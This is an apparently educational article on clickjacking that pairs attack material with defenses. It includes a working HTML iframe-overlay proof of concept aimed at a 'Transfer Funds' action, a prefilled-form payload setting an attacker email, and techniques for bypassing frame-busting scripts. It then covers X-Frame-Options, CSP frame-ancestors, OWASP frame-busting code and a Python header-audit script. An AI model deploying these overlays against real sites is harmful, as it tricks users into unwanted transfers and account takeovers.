Clickjacking

An Overview of Clickjacking

Clickjacking tricks users into clicking hidden elements on legitimate sites by overlaying invisible iframes. Attackers exploit this to perform unintended actions like liking posts or authorizing transactions without the user's awareness.

Core Concept

Clickjacking, also called UI redressing, uses transparent or opaque layers to hijack mouse clicks intended for a decoy page onto actionable content from another site. An attacker embeds the target site in an iframe, positions sensitive buttons under bait like "Free iPod," and makes the iframe invisible via CSS opacity or z-index manipulation.

Constructing a Basic Clickjacking Exploit

Basic clickjacking exploits use iframes to overlay invisible target site elements under enticing bait, hijacking clicks to trigger unintended actions. Attackers position buttons precisely with CSS and hide the iframe via opacity or z-index.

Core Attack Structure

The malicious page embeds the vulnerable site in an iframe, makes it transparent, and aligns a fake button over a sensitive target button like "Delete Account." Victims click the visible bait, but the browser registers it on the hidden element, executing the action with their session.

Basic HTML Example

This payload targets a site's "Transfer Funds" button, overlaying a "Free Gift" lure.

<!DOCTYPE html>
<html>
<head>
<style>
  iframe {
    position: absolute;
    top: 0;
    left: 0;
    opacity: 0.5;  /* Set to 0 in production */
    width: 800px;
    height: 600px;
    z-index: 1;
  }
  #bait {
    position: absolute;
    top: 200px;  /* Align over target button */
    left: 100px;
    z-index: 2;
  }
</style>
</head>
<body>
  <h1>Click for FREE GIFT!</h1>
  <iframe src="https://vulnerable-site.com/transfer?amount=1000&to=attacker"></iframe>
  <button id="bait">Claim Gift Now!</button>
</body>
</html>

Adjust positioning via trial-and-error to match the target's button coordinates.

Delivery Methods

Host on phishing sites, social media, or ads; variants use multiple iframes for multi-click sequences like OAuth approvals. Frame-busting bypasses include onbeforeunload dialogs or parameter injection to disable scripts.

Clickjacking Attacks Enabled by Injected Form Values

Clickjacking with injected form values exploits sites that prepopulate form fields via GET parameters, allowing attackers to craft iframes with malicious prefilled data. Victims click overlaid bait, submitting forms with attacker-controlled values using their authenticated session.

Prefilled Form Technique

Sites that read URL parameters (e.g., ?email=attacker@evil.com) to auto-fill inputs enable this variant, as attackers embed the manipulated URL in the iframe src. The transparent iframe loads with fields pre-populated, and a positioned decoy button aligns over "Submit," tricking users into confirmation.

Attack Execution

JavaScript on the target may pull GET params into form values, bypassing manual entry requirements. Positioning uses CSS top/left offsets calibrated via trial-and-error (e.g., top:400px, left:80px) with low iframe opacity (0.0001) for invisibility. This changes emails, passwords, or transfers without alerting the user.

Example Payload Structure

<iframe src="https://target.com/account?email=hacker@evil.com"></iframe>
Overlay with <div style="position:absolute; top:400px; left:80px; z-index:2;">Click to Win!</div> and iframe at opacity:0.0001; z-index:1.

Delivery via phishing lures users to the page while logged in.

Impact Amplification

Combines with CSRF-like actions but leverages UI deception; admin victims enable account takeovers or permission grants. Unlike basic clickjacking, prefill bypasses empty-field validations, increasing success rates.

Script-Based Clickjacking Defenses

Script-based clickjacking defenses, known as frame-busting scripts, use JavaScript to detect framing and break out by redirecting the top window or altering the DOM. These client-side measures complement headers like X-Frame-Options but face bypass risks from attackers.

Basic Frame Detection

Scripts check if window.self !== window.top, indicating an iframe, then redirect top.location.href = window.self.location.href to escape. Continuous polling via setInterval re-checks for dynamic iframe insertion.

if (top !== self) {
    top.location = self.location;
}

Enhanced Legacy Protection

OWASP's legacy-browser recommendation goes beyond the bare check: the page body is hidden by CSS until the script confirms the page is not framed, and only then is it revealed; if the page is framed, the top window is redirected. Older variants instead clear the top document (top.document.body.innerHTML = '') or hook window.onbeforeunload to resist navigation. The hide-then-reveal pattern enforces visibility only when the page is the top-level document:

<style id="antiClickjack">body { display: none !important; }</style>
<script>
  if (self === top) {
    // Not framed: remove the hiding style so the page renders normally
    document.getElementById("antiClickjack").remove();
  } else {
    // Framed: navigate the top window to this page to break out of the frame
    top.location = self.location;
  }
</script>

Limitations and Bypasses

Attackers disable these scripts via XSS filters that match and strip the script pattern, iframe sandbox attributes that block top-level navigation (the allow-top-navigation-by-user-activation token permits it only after a user gesture), or parameter injection. JavaScript-disabled zones or extensions such as NoScript also neutralize them, making headers preferable.

Layered Clickjacking Exploits

Layered clickjacking exploits stack multiple iframes or overlays to bypass defenses, chain actions, or handle multi-step interactions. These advanced variants defeat frame-busters, X-Frame-Options inconsistencies, or single-click limitations using precise positioning and timing.

Double/Triple Framing

Attackers nest iframes (e.g., attacker page → intermediate frame → target), blocking parent.location access due to same-origin violations. Outer frames use sandbox without allow-top-navigation to trap busting scripts, while inner layers capture clicks.

Multi-Step Sequencing

Hover detection over transparent divs (with pointer-events: auto) triggers timers, advancing through click chains like login → OAuth → self-XSS without click events. Redirect loopholes load unprotected internal pages in iframes, then bounce to login (checked only on initial URL).

Combined Attack Chains

Layer DOM XSS in iframes: click triggers payload execution on victim's session. Double clickjacking requires two precise clicks via stacked overlays, evading SameSite or single-interaction filters.

Bypass Techniques

URL parameter injection disables frame-busters: ?param=if(top!=self){...}
pointer-events: none on iframes passes clicks through layers
Z-index stacking with opacity gradients hides multi-frame complexity

Defenses Against Clickjacking Attacks

Defenses against clickjacking primarily use HTTP headers to control iframe embedding, with layered approaches for compatibility and robustness. X-Frame-Options provides legacy protection while CSP frame-ancestors offers modern flexibility.

X-Frame-Options Header

Set X-Frame-Options: DENY to block all framing, or SAMEORIGIN to allow only same-origin iframes. Deprecated but widely supported, it indicates if pages can render in frames, iframes, or objects; proxies may strip it, reducing reliability.

CSP frame-ancestors Directive

Content-Security-Policy: frame-ancestors 'none'; denies all embedding, 'self' permits same-origin framing, and a source list such as frame-ancestors 'self' https://trusted.com allows specific origins. It supersedes X-Frame-Options (and takes precedence when both are present in modern browsers) and supports multiple origins and wildcards.

Complementary Measures

Frame-busting JavaScript detects window.self !== window.top and redirects, but bypassable via sandbox or XSS. Combine headers (CSP overrides XFO) and test regularly; avoid sole reliance on deprecated ALLOW-FROM.
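The precedence rules above (CSP frame-ancestors wins over X-Frame-Options; ALLOW-FROM is ignored; no header means anyone can frame) as a small header audit, added here as an example and not code from the original page. The sample headers and hostnames (bank.example, trusted.example) are constructed, and the CSP source matching is simplified (no port or path matching).

```python
# Added example (not from the page): decide whether an ancestor origin may frame a
# page, following the precedence the page describes: a CSP frame-ancestors
# directive wins; otherwise X-Frame-Options applies; with neither, anyone can frame.
from fnmatch import fnmatchcase
from urllib.parse import urlsplit

def _same_origin(a, b):
    a, b = urlsplit(a), urlsplit(b)
    return (a.scheme, a.netloc) == (b.scheme, b.netloc)

def _match_source(src, ancestor, page):
    """Simplified CSP source match: 'none', 'self', scheme-source, host with wildcard."""
    src = src.strip("'").lower()
    anc = urlsplit(ancestor)
    if src == "none":
        return False
    if src == "self":
        return _same_origin(ancestor, page)
    if src in ("http:", "https:"):  # scheme-source
        return anc.scheme == src[:-1]
    scheme, _, host = src.rpartition("://")  # host-source, optional scheme
    if scheme and anc.scheme != scheme:
        return False
    return host == "*" or fnmatchcase(anc.hostname or "", host)

def can_be_framed(headers, page, ancestor):
    """Return (frameable_by_ancestor, mechanism_that_decided)."""
    h = {k.lower(): v for k, v in headers.items()}
    for directive in h.get("content-security-policy", "").split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() == "frame-ancestors":
            sources = value.split() or ["'none'"]  # empty value means 'none'
            return any(_match_source(s, ancestor, page) for s in sources), "csp"
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False, "xfo"
    if xfo == "SAMEORIGIN":
        return _same_origin(ancestor, page), "xfo"
    if xfo.startswith("ALLOW-FROM"):
        return True, "xfo-allow-from-ignored"  # modern browsers ignore ALLOW-FROM
    return True, "none"

# Constructed sample responses (not captured from any real site)
SAMPLES = {
    "deny": {"X-Frame-Options": "DENY"},
    "list": {"Content-Security-Policy": "frame-ancestors 'self' https://*.trusted.example"},
    "conflict": {"X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors https://partner.example"},
}
for name, hdrs in SAMPLES.items():
    print(name, can_be_framed(hdrs, "https://bank.example/transfer", "https://evil.example"))
```

The "conflict" sample shows why both headers must agree: the CSP directive permits partner.example even though X-Frame-Options says DENY.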